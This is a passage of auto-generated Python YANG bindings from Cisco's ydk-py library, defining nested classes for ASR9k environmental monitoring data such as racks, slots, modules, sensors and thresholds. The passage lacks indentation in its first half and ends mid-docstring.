cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_asr9k_sc_envmon_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_asr9k_sc_envmon_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_asr9k_sc_envmon_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XR_asr9k_sc_envmon_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR asr9k\-sc\-envmon package operational data.
This module contains definitions
for the following management objects\:
environmental\-monitoring\-cli\: Environmental Monitoring
Operational data space
environmental\-monitoring\: environmental monitoring
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class EnvironmentalMonitoringCli(_Entity_):
"""
Environmental Monitoring Operational data space
.. attribute:: rack_clis
Table of racks
**type**\: :py:class:`RackClis <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli, self).__init__()
self._top_entity = None
self.yang_name = "environmental-monitoring-cli"
self.yang_parent_name = "Cisco-IOS-XR-asr9k-sc-envmon-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("rack-clis", ("rack_clis", EnvironmentalMonitoringCli.RackClis))])
self._leafs = OrderedDict()
self.rack_clis = EnvironmentalMonitoringCli.RackClis()
self.rack_clis.parent = self
self._children_name_map["rack_clis"] = "rack-clis"
self._segment_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-oper:environmental-monitoring-cli"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli, [], name, value)
class RackClis(_Entity_):
"""
Table of racks
.. attribute:: rack_cli
Number
**type**\: list of :py:class:`RackCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis, self).__init__()
self.yang_name = "rack-clis"
self.yang_parent_name = "environmental-monitoring-cli"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("rack-cli", ("rack_cli", EnvironmentalMonitoringCli.RackClis.RackCli))])
self._leafs = OrderedDict()
self.rack_cli = YList(self)
self._segment_path = lambda: "rack-clis"
self._absolute_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-oper:environmental-monitoring-cli/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis, [], name, value)
class RackCli(_Entity_):
"""
Number
.. attribute:: rack (key)
Rack number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: slot_clis
Table of slots
**type**\: :py:class:`SlotClis <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli, self).__init__()
self.yang_name = "rack-cli"
self.yang_parent_name = "rack-clis"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['rack']
self._child_classes = OrderedDict([("slot-clis", ("slot_clis", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis))])
self._leafs = OrderedDict([
('rack', (YLeaf(YType.uint32, 'rack'), ['int'])),
])
self.rack = None
self.slot_clis = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis()
self.slot_clis.parent = self
self._children_name_map["slot_clis"] = "slot-clis"
self._segment_path = lambda: "rack-cli" + "[rack='" + str(self.rack) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-oper:environmental-monitoring-cli/rack-clis/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli, ['rack'], name, value)
class SlotClis(_Entity_):
"""
Table of slots
.. attribute:: slot_cli
Name
**type**\: list of :py:class:`SlotCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis, self).__init__()
self.yang_name = "slot-clis"
self.yang_parent_name = "rack-cli"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("slot-cli", ("slot_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli))])
self._leafs = OrderedDict()
self.slot_cli = YList(self)
self._segment_path = lambda: "slot-clis"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis, [], name, value)
class SlotCli(_Entity_):
"""
Name
.. attribute:: slot (key)
Slot name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: module_clis
Table of modules
**type**\: :py:class:`ModuleClis <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli, self).__init__()
self.yang_name = "slot-cli"
self.yang_parent_name = "slot-clis"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['slot']
self._child_classes = OrderedDict([("module-clis", ("module_clis", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis))])
self._leafs = OrderedDict([
('slot', (YLeaf(YType.str, 'slot'), ['str'])),
])
self.slot = None
self.module_clis = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis()
self.module_clis.parent = self
self._children_name_map["module_clis"] = "module-clis"
self._segment_path = lambda: "slot-cli" + "[slot='" + str(self.slot) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli, ['slot'], name, value)
class ModuleClis(_Entity_):
"""
Table of modules
.. attribute:: module_cli
Name
**type**\: list of :py:class:`ModuleCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis, self).__init__()
self.yang_name = "module-clis"
self.yang_parent_name = "slot-cli"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("module-cli", ("module_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli))])
self._leafs = OrderedDict()
self.module_cli = YList(self)
self._segment_path = lambda: "module-clis"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis, [], name, value)
class ModuleCli(_Entity_):
"""
Name
.. attribute:: module (key)
Module name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: sensor_type_clis
Table of sensor types
**type**\: :py:class:`SensorTypeClis <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis>`
**config**\: False
.. attribute:: power_cli
Module Power Draw
**type**\: :py:class:`PowerCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli, self).__init__()
self.yang_name = "module-cli"
self.yang_parent_name = "module-clis"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['module']
self._child_classes = OrderedDict([("sensor-type-clis", ("sensor_type_clis", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis)), ("power-cli", ("power_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli))])
self._leafs = OrderedDict([
('module', (YLeaf(YType.str, 'module'), ['str'])),
])
self.module = None
self.sensor_type_clis = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis()
self.sensor_type_clis.parent = self
self._children_name_map["sensor_type_clis"] = "sensor-type-clis"
self.power_cli = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli()
self.power_cli.parent = self
self._children_name_map["power_cli"] = "power-cli"
self._segment_path = lambda: "module-cli" + "[module='" + str(self.module) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli, ['module'], name, value)
class SensorTypeClis(_Entity_):
    """
    Table of sensor types

    .. attribute:: sensor_type_cli

    Type of sensor

    **type**\: list of :py:class:`SensorTypeCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli>`

    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'asr9k-sc-envmon-oper'
    _revision = '2017-01-19'

    def __init__(self):
        # Python 2/3 compatible super() call on a deeply nested class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis, self).__init__()

        self.yang_name = "sensor-type-clis"
        self.yang_parent_name = "module-cli"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Maps YANG child names to (python attribute name, binding class).
        self._child_classes = OrderedDict([("sensor-type-cli", ("sensor_type_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli))])
        self._leafs = OrderedDict()

        # YANG list: entries are appended by the user or populated on read.
        self.sensor_type_cli = YList(self)
        self._segment_path = lambda: "sensor-type-clis"
        # Must be set last: freezes attribute creation via __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis, [], name, value)


    class SensorTypeCli(_Entity_):
        """
        Type of sensor

        .. attribute:: type  (key)

        Sensor type

        **type**\: str

        **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+

        **config**\: False

        .. attribute:: sensor_name_clis

        Table of sensors

        **type**\: :py:class:`SensorNameClis <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis>`

        **config**\: False
        """

        _prefix = 'asr9k-sc-envmon-oper'
        _revision = '2017-01-19'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli, self).__init__()

            self.yang_name = "sensor-type-cli"
            self.yang_parent_name = "sensor-type-clis"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            # 'type' is the YANG list key for this entry.
            self.ylist_key_names = ['type']
            self._child_classes = OrderedDict([("sensor-name-clis", ("sensor_name_clis", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis))])
            self._leafs = OrderedDict([
                ('type', (YLeaf(YType.str, 'type'), ['str'])),
            ])
            self.type = None

            # Child container: wired to self so path resolution walks upward.
            self.sensor_name_clis = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis()
            self.sensor_name_clis.parent = self
            self._children_name_map["sensor_name_clis"] = "sensor-name-clis"
            # Segment path includes the key predicate for this list entry.
            self._segment_path = lambda: "sensor-type-cli" + "[type='" + str(self.type) + "']"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli, ['type'], name, value)


        class SensorNameClis(_Entity_):
            """
            Table of sensors

            .. attribute:: sensor_name_cli

            Name of sensor

            **type**\: list of :py:class:`SensorNameCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli>`

            **config**\: False
            """

            _prefix = 'asr9k-sc-envmon-oper'
            _revision = '2017-01-19'

            def __init__(self):
                if sys.version_info > (3,):
                    super().__init__()
                else:
                    super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis, self).__init__()

                self.yang_name = "sensor-name-clis"
                self.yang_parent_name = "sensor-type-cli"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([("sensor-name-cli", ("sensor_name_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli))])
                self._leafs = OrderedDict()

                self.sensor_name_cli = YList(self)
                self._segment_path = lambda: "sensor-name-clis"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis, [], name, value)


            class SensorNameCli(_Entity_):
                """
                Name of sensor

                .. attribute:: name  (key)

                Sensor name

                **type**\: str

                **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+

                **config**\: False

                .. attribute:: value_detailed_cli

                Detailed sensor information including the sensor value

                **type**\: :py:class:`ValueDetailedCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ValueDetailedCli>`

                **config**\: False

                .. attribute:: threshold_clis

                The threshold information

                **type**\: :py:class:`ThresholdClis <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis>`

                **config**\: False

                .. attribute:: value_brief_cli

                The sensor value

                **type**\: str

                **pattern:** [0\-9a\-fA\-F]{1,8}

                **config**\: False
                """

                _prefix = 'asr9k-sc-envmon-oper'
                _revision = '2017-01-19'

                def __init__(self):
                    if sys.version_info > (3,):
                        super().__init__()
                    else:
                        super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli, self).__init__()

                    self.yang_name = "sensor-name-cli"
                    self.yang_parent_name = "sensor-name-clis"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = ['name']
                    self._child_classes = OrderedDict([("value-detailed-cli", ("value_detailed_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ValueDetailedCli)), ("threshold-clis", ("threshold_clis", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis))])
                    self._leafs = OrderedDict([
                        ('name', (YLeaf(YType.str, 'name'), ['str'])),
                        ('value_brief_cli', (YLeaf(YType.str, 'value-brief-cli'), ['str'])),
                    ])
                    self.name = None
                    self.value_brief_cli = None

                    self.value_detailed_cli = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ValueDetailedCli()
                    self.value_detailed_cli.parent = self
                    self._children_name_map["value_detailed_cli"] = "value-detailed-cli"

                    self.threshold_clis = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis()
                    self.threshold_clis.parent = self
                    self._children_name_map["threshold_clis"] = "threshold-clis"
                    self._segment_path = lambda: "sensor-name-cli" + "[name='" + str(self.name) + "']"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli, ['name', 'value_brief_cli'], name, value)


                class ValueDetailedCli(_Entity_):
                    """
                    Detailed sensor information including
                    the sensor value

                    .. attribute:: field_validity_bitmap

                    Sensor valid bitmap

                    **type**\: int

                    **range:** 0..4294967295

                    **config**\: False

                    .. attribute:: device_description

                    Device Name

                    **type**\: str

                    **length:** 0..50

                    **config**\: False

                    .. attribute:: units

                    Units of variable being read

                    **type**\: str

                    **length:** 0..50

                    **config**\: False

                    .. attribute:: device_id

                    Identifier for this device

                    **type**\: int

                    **range:** 0..4294967295

                    **config**\: False

                    .. attribute:: value

                    Current reading of sensor

                    **type**\: int

                    **range:** 0..4294967295

                    **config**\: False

                    .. attribute:: alarm_type

                    Indicates threshold violation

                    **type**\: int

                    **range:** 0..4294967295

                    **config**\: False

                    .. attribute:: data_type

                    Sensor data type enums

                    **type**\: int

                    **range:** 0..4294967295

                    **config**\: False

                    .. attribute:: scale

                    Sensor scale enums

                    **type**\: int

                    **range:** 0..4294967295

                    **config**\: False

                    .. attribute:: precision

                    Sensor precision range

                    **type**\: int

                    **range:** 0..4294967295

                    **config**\: False

                    .. attribute:: status

                    Sensor operation state enums

                    **type**\: int

                    **range:** 0..4294967295

                    **config**\: False

                    .. attribute:: age_time_stamp

                    Age of the sensor value; set to the current time if directly access the value from sensor

                    **type**\: int

                    **range:** 0..4294967295

                    **config**\: False

                    .. attribute:: update_rate

                    Sensor value update rate;set to 0 if sensor value is updated and evaluated immediately

                    **type**\: int

                    **range:** 0..4294967295

                    **config**\: False

                    .. attribute:: average

                    Average sensor value over time interval

                    **type**\: int

                    **range:** \-2147483648..2147483647

                    **config**\: False

                    .. attribute:: minimum

                    Minimum Sensor value over time interval

                    **type**\: int

                    **range:** \-2147483648..2147483647

                    **config**\: False

                    .. attribute:: maximum

                    Maximum Sensor value over time interval

                    **type**\: int

                    **range:** \-2147483648..2147483647

                    **config**\: False

                    .. attribute:: interval

                    Time Interval over which sensor value is monitored

                    **type**\: int

                    **range:** \-2147483648..2147483647

                    **config**\: False
                    """

                    _prefix = 'asr9k-sc-envmon-oper'
                    _revision = '2017-01-19'

                    def __init__(self):
                        if sys.version_info > (3,):
                            super().__init__()
                        else:
                            super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ValueDetailedCli, self).__init__()

                        self.yang_name = "value-detailed-cli"
                        self.yang_parent_name = "sensor-name-cli"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        # Leaf-only container: no child classes.
                        self._child_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('field_validity_bitmap', (YLeaf(YType.uint32, 'field-validity-bitmap'), ['int'])),
                            ('device_description', (YLeaf(YType.str, 'device-description'), ['str'])),
                            ('units', (YLeaf(YType.str, 'units'), ['str'])),
                            ('device_id', (YLeaf(YType.uint32, 'device-id'), ['int'])),
                            ('value', (YLeaf(YType.uint32, 'value'), ['int'])),
                            ('alarm_type', (YLeaf(YType.uint32, 'alarm-type'), ['int'])),
                            ('data_type', (YLeaf(YType.uint32, 'data-type'), ['int'])),
                            ('scale', (YLeaf(YType.uint32, 'scale'), ['int'])),
                            ('precision', (YLeaf(YType.uint32, 'precision'), ['int'])),
                            ('status', (YLeaf(YType.uint32, 'status'), ['int'])),
                            ('age_time_stamp', (YLeaf(YType.uint32, 'age-time-stamp'), ['int'])),
                            ('update_rate', (YLeaf(YType.uint32, 'update-rate'), ['int'])),
                            ('average', (YLeaf(YType.int32, 'average'), ['int'])),
                            ('minimum', (YLeaf(YType.int32, 'minimum'), ['int'])),
                            ('maximum', (YLeaf(YType.int32, 'maximum'), ['int'])),
                            ('interval', (YLeaf(YType.int32, 'interval'), ['int'])),
                        ])
                        self.field_validity_bitmap = None
                        self.device_description = None
                        self.units = None
                        self.device_id = None
                        self.value = None
                        self.alarm_type = None
                        self.data_type = None
                        self.scale = None
                        self.precision = None
                        self.status = None
                        self.age_time_stamp = None
                        self.update_rate = None
                        self.average = None
                        self.minimum = None
                        self.maximum = None
                        self.interval = None
                        self._segment_path = lambda: "value-detailed-cli"
                        self._is_frozen = True

                    def __setattr__(self, name, value):
                        self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ValueDetailedCli, ['field_validity_bitmap', 'device_description', 'units', 'device_id', 'value', 'alarm_type', 'data_type', 'scale', 'precision', 'status', 'age_time_stamp', 'update_rate', 'average', 'minimum', 'maximum', 'interval'], name, value)

                    @staticmethod
                    def _meta_info():
                        # Deferred import: the generated _meta table is large.
                        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                        return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ValueDetailedCli']['meta_info']


                class ThresholdClis(_Entity_):
                    """
                    The threshold information

                    .. attribute:: threshold_cli

                    Types of thresholds

                    **type**\: list of :py:class:`ThresholdCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli>`

                    **config**\: False
                    """

                    _prefix = 'asr9k-sc-envmon-oper'
                    _revision = '2017-01-19'

                    def __init__(self):
                        if sys.version_info > (3,):
                            super().__init__()
                        else:
                            super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis, self).__init__()

                        self.yang_name = "threshold-clis"
                        self.yang_parent_name = "sensor-name-cli"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([("threshold-cli", ("threshold_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli))])
                        self._leafs = OrderedDict()

                        self.threshold_cli = YList(self)
                        self._segment_path = lambda: "threshold-clis"
                        self._is_frozen = True

                    def __setattr__(self, name, value):
                        self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis, [], name, value)


                    class ThresholdCli(_Entity_):
                        """
                        Types of thresholds

                        .. attribute:: type  (key)

                        Threshold type

                        **type**\: str

                        **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+

                        **config**\: False

                        .. attribute:: value_detailed_cli

                        Detailed sensor threshold information

                        **type**\: :py:class:`ValueDetailedCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli.ValueDetailedCli>`

                        **config**\: False

                        .. attribute:: trap_cli

                        Threshold trap enable flag true\-ENABLE, false\-DISABLE

                        **type**\: bool

                        **config**\: False

                        .. attribute:: value_brief_cli

                        Threshold value for the sensor

                        **type**\: str

                        **pattern:** [0\-9a\-fA\-F]{1,8}

                        **config**\: False
                        """

                        _prefix = 'asr9k-sc-envmon-oper'
                        _revision = '2017-01-19'

                        def __init__(self):
                            if sys.version_info > (3,):
                                super().__init__()
                            else:
                                super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli, self).__init__()

                            self.yang_name = "threshold-cli"
                            self.yang_parent_name = "threshold-clis"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['type']
                            self._child_classes = OrderedDict([("value-detailed-cli", ("value_detailed_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli.ValueDetailedCli))])
                            self._leafs = OrderedDict([
                                ('type', (YLeaf(YType.str, 'type'), ['str'])),
                                ('trap_cli', (YLeaf(YType.boolean, 'trap-cli'), ['bool'])),
                                ('value_brief_cli', (YLeaf(YType.str, 'value-brief-cli'), ['str'])),
                            ])
                            self.type = None
                            self.trap_cli = None
                            self.value_brief_cli = None

                            self.value_detailed_cli = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli.ValueDetailedCli()
                            self.value_detailed_cli.parent = self
                            self._children_name_map["value_detailed_cli"] = "value-detailed-cli"
                            self._segment_path = lambda: "threshold-cli" + "[type='" + str(self.type) + "']"
                            self._is_frozen = True

                        def __setattr__(self, name, value):
                            self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli, ['type', 'trap_cli', 'value_brief_cli'], name, value)


                        class ValueDetailedCli(_Entity_):
                            """
                            Detailed sensor threshold
                            information

                            .. attribute:: threshold_severity

                            Indicates minor, major, critical severities

                            **type**\: int

                            **range:** 0..4294967295

                            **config**\: False

                            .. attribute:: threshold_relation

                            Indicates relation between sensor value and threshold

                            **type**\: int

